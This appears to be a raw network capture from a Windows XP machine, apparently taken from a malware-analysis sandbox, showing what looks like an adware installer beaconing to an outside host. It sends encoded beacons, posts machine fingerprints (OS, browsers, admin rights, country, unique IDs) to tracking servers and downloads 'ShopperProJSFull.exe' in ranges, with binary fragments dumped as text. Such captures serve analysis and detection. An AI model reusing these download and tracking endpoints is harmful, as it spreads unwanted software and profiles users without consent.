Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Fri, 19 Jun 2015 06:16:49 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /21405.ashx?e=043Mckb8Lng3732dIkiRjrc6SIxRQRtBH/3nQdMFfOAoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU450z1I49BqHHs6NZFD4Ir5RXZw XidYyOqT8hXp 3YGKZG16Dbbuw50u5/ xwfuCdwGAJFdFes7 /wsHnwsxHHbeG0picB3eoeudGrX9r3ODqz4gguKWlYXZ7CQlHfCCFoKuJL2x o5erVet 40raSRZqUKOZJxNkS1CaPMmNRTpbGzesqwfp41URL4UUnJT9aLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOOdM9SOPQahx7OjWRQ CK UXf 5LQGhpDiQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:53 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21405.ashx?e=lOCrbsNL2zWYW6sXTpZ7/McrIdqQqjphDjQZdK 7JLk2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3SXxmarrZLBmoGtPoa5D1iOcnF290GY/Hng fWZsLDRwOWufSVBCsQTuVqOEbeDQPHiyoaNv5jwYGplaxtKDMMapRW8qn0uD1ce90znhXYsIjgb6v7cXpPsHbyM38hHidWLqEwh0zCuoJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wZ8rnD0zDzgS HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:53 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Fri, 19 Jun 2015 06:16:53 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /20069.ashx?e=/9ZmISdorEtXP6639e gu4CqKDcj8uMnbZVhyzd0GYdXGmhmyGgv7pzaErgvbAYV621wjv8RxAGZlZFDj59jrYw2smzewqm3WLazpewXw1jSN3ZRr1JhaATxIUcsgQ w24gBuBZeJveENvzEMy06jAim/q/4gaQlDRE129XYpddKg1LuiKfBgDSL91i7wx2uIMit4PcmA/ B5nIkMjph0BJ7ytXtOq9SKV0xCpDcC6H0EVi8F2tm8q/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGS5zOIEyMDZuzsHlRkWrcy9IYL8x1ybsb4FXLrRIVqTq10EZsxP4trEIkQsYPNggSlJQe0vxDLEzDsdDpQ6tGYTDDFQRMbEPS5buk E/GYgm2eAM7Jzw6swR7RnFho7Rn7WHgQmXA2MPg6HJhsczLjsYedDXuoFG0gAFY/ZqHQMugt9wYGdj4EP0rnMqlstLHTEz4kyYc5//dQHTdmYs6gjLjTdd8VgPBfBivPhM/YnfDHb79ui4dGUIoYINd0HuRLqbllCNa64YJWkcN48ynFSwX6xxcj6ZZ25/99W//4LZfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxZjnXlvApvj8 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:50 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Fri, 19 Jun 2015 06:16:50 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /monetization.gif?event=3&ibic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&campaign=000803&country=ua&app=70299&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1434694627&asw=0_1073750528_-2147483648_2048&browser=&rnd=1434694627 HTTP/1.1

Host: logs.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:17:06 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1434694626.dop003.am4.t,1434694626.cds058.am4.c

GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Fri, 19 Jun 
2015 06:17:06 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
live..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07
 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 
35..Content-Type: image/gif..X-HW: 1434694626.dop003.am4.t,1434694626.
cds058.am4.c..GIF89a.............,...........D..;..

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Fri, 19 Jun 2015 05:32:30 GMT

Last-Modified: Fri, 19 Jun 2015 05:19:58 GMT

ETag: "4725e0005d5764ca825a7394d1d4a9aa"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 0-249999/2684416

Age: 2649

X-Cache: Hit from cloudfront

Via: 1.1 951bc6ecd5fb2c9732f14df07a0958a9.cloudfront.net (CloudFront)

X-Amz-Cf-Id: UWl86-OIAcbGnGkCnjeJ0JPsl-sgYaWcv9dovcGvLIietgwe-GHAOw==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
........T.)......................................s....................
..P.(..............................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive



..`[email protected]#...\^TF`.J..".....r...)MC..e.-.%..T.-.#.d
.Lh(....G.D.V..T...`.non8........R.\N..v...H...W..I..e.2........i?.E. 
...{.)<..-e.u....Gj.Ws.%........Y.=.*s.A~.v.,RU..%{..U.d....R.L|u..
."G.qy...d...._....._.ZG........r0q..(.f..x^o...X0.w.).26:......^..=.}
[email protected]}....b3z.e<......Lwc...q.D....d...Y'...H..^f....~
.L.8.i........<8F....?5lj..%..*.`F.;.(.6.z>..4..>>1.r...E.
)^Z{....!..U.x|A.#..H6(WR.).)[email protected] :....Q..)....
..F..S...P..'.9.2~.&...e............[..z.)O|.E%{c..fn.J...;..Z..1...J.
.p.VFU.............|]....E..Q7..v.....F'..'....].K.k.f.]........Kn.C..
...g.s>g..>C8.5}b*......K..&H.=Du....u{e/...<.u.X....o...Wu..
....:.i...8._.4)..hBD..<,"....5..>...!..AoRX1H..U.jOt.L...T.`_h.
Hm....k..I..M!.2..R.r,...b.Kw......ZM..^O.5}9.............F...B...x...
x...%e_.V.........P.&.....c5z.1/.C......xL.w(...r..(.|s...f.3$;)..5F.D
.V.2...V$..A:.{.......3'...RL...s.>.........!.....n.....n.@.....;..
9M.`..:.F.......mw..l../alD[.......*........W.P....r..=W..P..&H2?D]:d.
........s.SNB TQ.=.....F..N.;.....v.&..`}...U..,w8.d..e......u."PES.K`
i...go.F.{k!.>R1..D.G....L..... ....J........o!L.F.).J..?.8M.[.x...
.$...z.<5.)jG$DH..0.B.{._....Uvh%)[......& /.n2/q...Z.G.d3v........
[email protected].<Nc,Q(....^c....u......^.v.......y.....Im..'..v$.
(.tc.3...5. L...T.X.`..N...9...8l.....G.9...H.(..b$....X.....7B.).a.{~
.>E...W/.........u_/.!.dr2...6h.....>.`@._1..../.be.z...:0.".cnh
..._...JL.-.U.."*/".]...3.O...P..L.@C..^.=D.pt...s.....pd..-....O.<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Fri, 19 Jun 2015 05:32:30 GMT

Last-Modified: Fri, 19 Jun 2015 05:19:58 GMT

ETag: "4725e0005d5764ca825a7394d1d4a9aa"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 1500000-1749999/2684416

Age: 2650

X-Cache: Hit from cloudfront

Via: 1.1 951bc6ecd5fb2c9732f14df07a0958a9.cloudfront.net (CloudFront)

X-Amz-Cf-Id: IiVUHnDjhy_hfrgKxYViCjnBTB_gkHquXFW79wTrg6G2QeDhJ-3xxQ==
.F.1.i...........Qwp .|B.........uZ......Nw#'fL.C.".n...'d.......rd.,8
..1.....{...d..V.I.]A0A..9p...o.I....#..$.},.5..t.(..&.,.....THp.%u...
.)]......QhcUv.v_Y... >.....\^.Wj...QF .{.......&J..9....#)g...T,..
.e$&....\.........?...|...mONg%.e..r: ...=.......n....9..c,0..*oO\'..a
..G....%. .`o.\.'.Q~..6&....~.."y..P...S/I.....S.1J..K...'.... .......
.I......dLUL.5.MV....{..h.]../.{...t./.Q.3Q.......,..P>...*....u...
... .a..Ck2..........h..X.`.4&.M...r.d..Y..JJT[dT..N.d....^<M...B..
6...r...F..h.`..1..DK2/.k.......T.":.T.....>=.%.....N....5w.o).p.\y
.me.......z..e.'..{v. .....\ ....U....S..sy.>B.....Y.\%..=O".z #|..
wW...% O.?...&..N.z:..#:.)D....m$I.....r...i.j@.......*-O.1..-`..QTW.=
#".u.h.2...3?./t..k..[......WF.d\.z/..F.|.v.=.9`C%^>61.k.....E.0.y.
.<.N..8C...u'.......~O.....a'..S..<&.aS*....x..`..A 98.\f.../..I
&.,.}..j..J./........l..OWo9N......MX._.....B..o7.....'].Cq.....X~....
..U7..q.W....4.RI<...].N.}`u...)N.>}..@$^...4....,D.z.J.....5.4.
[email protected]...|.........(.<..E.L.t.RS.....y
.{.x.Cm6?`. [email protected] ..%/........V..0....KhG...*...0...!Vi..
..\.BP..5G...s.7`......."GRn......o..p. 8A8..........G..!.o/...]z.nz..
.d..<w......zJ/..,..od.....(..#O.$0DN.-..S..1........U .q)Ut.}. ...
,..!Q5...W..w9N.........o.. ..K...=...K....ZZ.J.ng4..^...>...6a....
.~..}...lf...wj"....?Ey..p|..n....d...k.z...V.F( ..K/...8)...}.YR.GDM.
..{hy.Y...%.19{gb.D...J..E..;~..O%..cz.o......-T.HM..^5\tr...=7Ma*.0..
...zd..M0O..J.Q..Z]..g.,.a".9...n.z}^..M..JJ.5.{.L..Ql...j..|..v..<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Fri, 19 Jun 2015 05:32:30 GMT

Last-Modified: Fri, 19 Jun 2015 05:19:58 GMT

ETag: "4725e0005d5764ca825a7394d1d4a9aa"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 2000000-2249999/2684416

Age: 2650

X-Cache: Hit from cloudfront

Via: 1.1 951bc6ecd5fb2c9732f14df07a0958a9.cloudfront.net (CloudFront)

X-Amz-Cf-Id: c4nv27v3m9xjVcQSx2-D9XFCjk-sAfoQGRVyK2zpGzMrLnLDPnsecQ==
.]...-.e(O,........(6,......V...Ip.Rh?v..D."8..-.....F..Q....c.lkwM...
..'..............*.-..*..s<.iti..#y.<$.f.....IB..Q.......-{1....
q7A.e0.s.p%....l.....l "..Og\X...e..e...:..i..P...2....7j.|Q2.{^R.@...
..%.i...7!......M~..3......3.j.X,...ICP)..A}.zX.....~.z,..I..).3.:...%
\8Hd.. ..t.....`Gb....c.D.V...5..aM..7 5....Rf........T.....#..:.~NPr:
....h........}[email protected].[.......j.E@.&.....'4l
...M:....VN..L.L..\........H}*6*g#..k.y....2......3..`1w.C......H5.ez?
.....c.. .2.....fS,Gmq.]pB<..K1...U.y.....8..._%.%..u.W"....~c....k
.3.H......T.K...$.F..........:..|%.....J%..V..LK.o ...=.._L.#..K.I...?
N..(!.c-.........r*C...F..X.h...MV#.`{.f...'.....x5...\k.}..`Cv.....@P
j.Z...Y....HC,..]..t.?..y$.)[.|S.B$..R<. .s.............._J"BS....A
5.$.rJ.q....,.....I.`h...a...uK...t ....c;F..G....ok.....p.....x_.....
^..)..b....mQB....n........:.5b.c.M...C.i..N.]i{.X......3.!o.i.K..6...
...n... ..:.0....j.1...v....=....vD6..(.H\[email protected]..}.3.)..d{
0H.......#.oc.[.a.."...>U ....eSc.....[F...P.&.B...B.....`.....V...
...x.R.....B>........x.t...4yuq..o....B....~...0.......E$...p.>.
\....!.%E.D...n32.3......U.../.||..b...S;[email protected]).[[email protected]/h..
|t..4..<.oi.z.N.w................>.......mf..-...........x..2j.w
x1.8.6........9.........O5....v..qwa..\..32O&M....~h=..s.B.......=.UW.
#..9.wk..z......t...D#..2......_-=.].=.../]5...~.q..T#.............?.;
.0U. v...5\..|..,w. [email protected].....~R...h....2Q.H.N8.[..2.xr..cj..*..
...#..9.\..ad5.I....2.......,m......~.z.}L..E.....n@`wA....M....*.<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=2500000-2684415

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 184416

Connection: keep-alive

Date: Fri, 19 Jun 2015 05:32:30 GMT

Last-Modified: Fri, 19 Jun 2015 05:19:58 GMT

ETag: "4725e0005d5764ca825a7394d1d4a9aa"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 2500000-2684415/2684416

Age: 2650

X-Cache: Hit from cloudfront

Via: 1.1 951bc6ecd5fb2c9732f14df07a0958a9.cloudfront.net (CloudFront)

X-Amz-Cf-Id: cLHeuZFUs55mDpV7nOTW2WWKtsXWVBi3yTCGLpGrusQI7QOgZROWjQ==
.o.){I.k....^^..(...{..o..h._...#5...d......$...C....Z...r;....E..#q6.
.....9.N'...`......]1..=X./.E...r..wap.f 7.%.Q...c'K.N.C....%....EsxD.
f&..3)./. .F.!.........CI..}.....ZM....s..,.U.t.V......9........{-D<
;..({mXKY."....[.9...aG...v..p....YeX..(@.t...*F...T..>..E3........
.c..]p...... '...<P.......&....-k......6.$3.... .......(c..G#N ....
.{...iK.....H.A.;]z.....J..P..o3)...EH..Y/.X.R.!7;..aP....%.8....d...0
..-.L...zKt......=.;=.K.i.@t}~.lE......b=....0...?..A.....w..c...lZH..
..........-g........bj...n.....L>.*."[email protected]...
YK.e...(.ji...o...09.*.W.S!A..J............U,..HI...F..t..0.z.^,wn..\d
.......:_.t...6..f....8"..%....;..<.._.T..{[email protected].:
l.(m./.!.gi.M._0.K.*zQ.."B....tr.....b...A"..h,...O.W.D->..".......
../A..;P....d../y;. ....yp\.=.......>Rd... [email protected]
..a......ux...-U~....;.o.!H..bt i#9.=@(...^....Ct.....0b...}...&.\.9.W
.3..#...v?.D.U......3..{..2d.^[....{.3^:V"..q.5....[0;9>.!d.....lb.
M.L.$'......n.l..V....s.x..'zb...B..~.H..x....<...?.l....3E.DcI s'n
.*...Q......jp..I}r...;r..D....1.)..../.q._o~p.................i...cr.
..~....=f.,d......aH............?.....l..6n.U....Ne.........T}...%...&
gt;>...^..M.U.....Hq...).z...C..oAke...#-$...........f.......FP@9d.
.'.96.X&...:....!.~...]....d..P.M/N..:..ns..?.#....5Z,Rx@j<....5k..
gA!.........E....Mg...............S.2.y4m.@. ;...M.6...($W...H...Fi.v.
)...y..|k.."............_..UQ..9{.p".#8F{....HM...L#t......j1X cb-w.z.
..q .r.._..D...>V...e...q......VG.01.......J...`........E.X...g<<< skipped >>>

GET /9874.ashx?e=VUrHHbcUInechLpJKTn3oGtOebixRaL2aMzgTHP7UuxxTYwWxYG9WJimSgauFBdeEsZQDBxy5lrBMCtxANQqTi4btG OZIk/mETyJyixTFVdn5IXPnT9 7PiCC4paVhdjnbMS4Pfob2H0XoEMGadmzHO2Dr7jPCamGrlhGzdRreQ4tlZncg0sEGwORpUjcC7CPnfnn4CX XGCkggys1PVXld7plMo70c5pdl3V4yoSZtC3ZUXmNv4hOEZ9fC9NN7s9C7tmmeIQ4UJj9eY3tRmk7I4yfJnN09minhshScISYDaFJEA74lB0xM JMmHOf/CqmVamFpcHD06e//qoDUTWzVjed5m HMSEHW2fSX6silL2b9fYt3DRfGpa6r1ttomZQQFfz/kCGvtlCUNlcxdDduSSgggr3kU4faTJ9xeijHEuW6CCH/UMJlTfV6gAodj6aKjJbkaS2Zw4YBH3MDkPlHiMBExjDPgZ11cIh4ppWIdnmPAA8Dk0COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mhfCqXqcp6BQ= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:54 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Fri, 19 Jun 2015 06:16:54 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET / HTTP/1.1

Host: ipgeoapi.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:17:04 GMT

Connection: keep-alive

Content-Type: application/json;charset=utf-8

Content-Length: 40

Server: thin 1.4.1 codename Chromeo

Via: 1.1 vegur

{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Fri, 19
 Jun 2015 06:17:04 GMT..Connection: keep-alive..Content-Type: applicat
ion/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codenam
e Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..

GET /monetization.gif?event=3&ibic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&campaign=001729&country=ua&app=70881&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1434694627&asw=0_1073750528_-2147483648_2048&browser=&rnd=1434694627 HTTP/1.1

Host: logs.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:17:06 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1434694626.dop007.am4.t,1434694626.cds058.am4.c

GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Fri, 19 Jun 
2015 06:17:06 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
live..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07
 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 
35..Content-Type: image/gif..X-HW: 1434694626.dop007.am4.t,1434694626.
cds058.am4.c..GIF89a.............,...........D..;..

GET /utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1434694627 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2:  4EYdm3tXA7wlOFbbEKoW6sDL8 MZpkNC lLZcEW83L4BuQLv9ZNwcKLAfJptcRP50cvnoRyvbk=

x-amz-request-id: C4B048C805892936

Date: Fri, 19 Jun 2015 06:17:02 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2:  4EYdm
3tXA7wlOFbbEKoW6sDL8 MZpkNC lLZcEW83L4BuQLv9ZNwcKLAfJptcRP50cvnoRyvbk=
..x-amz-request-id: C4B048C805892936..Date: Fri, 19 Jun 2015 06:17:02 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Mon, 18 May 2015 15:31:15 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....


GET /installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=AE816059066843AA87631C5123001412PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1434694627&procruntime=5&rnd=1434694632 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: G9AY2bNRj0dbEUg9/GkkqI2Bv3c0OYLgUNxTNrEMKlcybTBScPXzvv5ekOVanTIvC840xsiezDU=

x-amz-request-id: FF2C390D85304FEB

Date: Fri, 19 Jun 2015 06:17:07 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:10 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: G9AY2b
NRj0dbEUg9/GkkqI2Bv3c0OYLgUNxTNrEMKlcybTBScPXzvv5ekOVanTIvC840xsiezDU=
..x-amz-request-id: FF2C390D85304FEB..Date: Fri, 19 Jun 2015 06:17:07 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Mon, 18 May 2015 15:31:10 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....

GET /utility.gif?report=fdata&f=1&c=000803&i=200&n=init_end_funnel_step_name&rnd=1434694633 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Zn9QyYYHMjUNPANhoSI8jQ9h8EZS8QHv32Vv9HWcjFZpBsctOCHPWhJf0N39r0bL8hllZcs6oEE=

x-amz-request-id: F10696FB9010267E

Date: Fri, 19 Jun 2015 06:17:07 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=300&n=deploy_start_funnel_step_name&rnd=1434694633 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 9MUBmxJTxsvh80NpViXKj6FlI5oNYqKL11pKr4LAcyetvB3WCrQE6I7T9svP09JeDo24FKdPzpA=

x-amz-request-id: 1147F99E9D68B765

Date: Fri, 19 Jun 2015 06:17:07 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 9MUBmx
JTxsvh80NpViXKj6FlI5oNYqKL11pKr4LAcyetvB3WCrQE6I7T9svP09JeDo24FKdPzpA=
..x-amz-request-id: 1147F99E9D68B765..Date: Fri, 19 Jun 2015 06:17:07 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Mon, 18 May 2015 15:31:15 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....

GET /utility.gif?report=fdata&f=1&c=000803&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1434694634 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: v2/7kuI0iP53 T6EN/Vnwjbm6uHn61epIWBiSSo8zOOED9FUBfE9J/V2r8J9qDEpHqzlJXA0SkQ=

x-amz-request-id: C614BBA856BE52C5

Date: Fri, 19 Jun 2015 06:17:09 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: v2/7ku
I0iP53 T6EN/Vnwjbm6uHn61epIWBiSSo8zOOED9FUBfE9J/V2r8J9qDEpHqzlJXA0SkQ=
..x-amz-request-id: C614BBA856BE52C5..Date: Fri, 19 Jun 2015 06:17:09 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Mon, 18 May 2015 15:31:15 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....

GET /utility.gif?report=fdata&f=1&c=000803&i=500&n=deploy_notification_start_funnel_step_name&rnd=1434694635 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 1PqAlDUN8hhA7w2vA/kGC4 HaCUnLvlsuQqQVNCftufG BcdJ6WEsycI4jQrB5EXAam 2SiRcsg=

x-amz-request-id: 51351AFC5F430291

Date: Fri, 19 Jun 2015 06:17:10 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

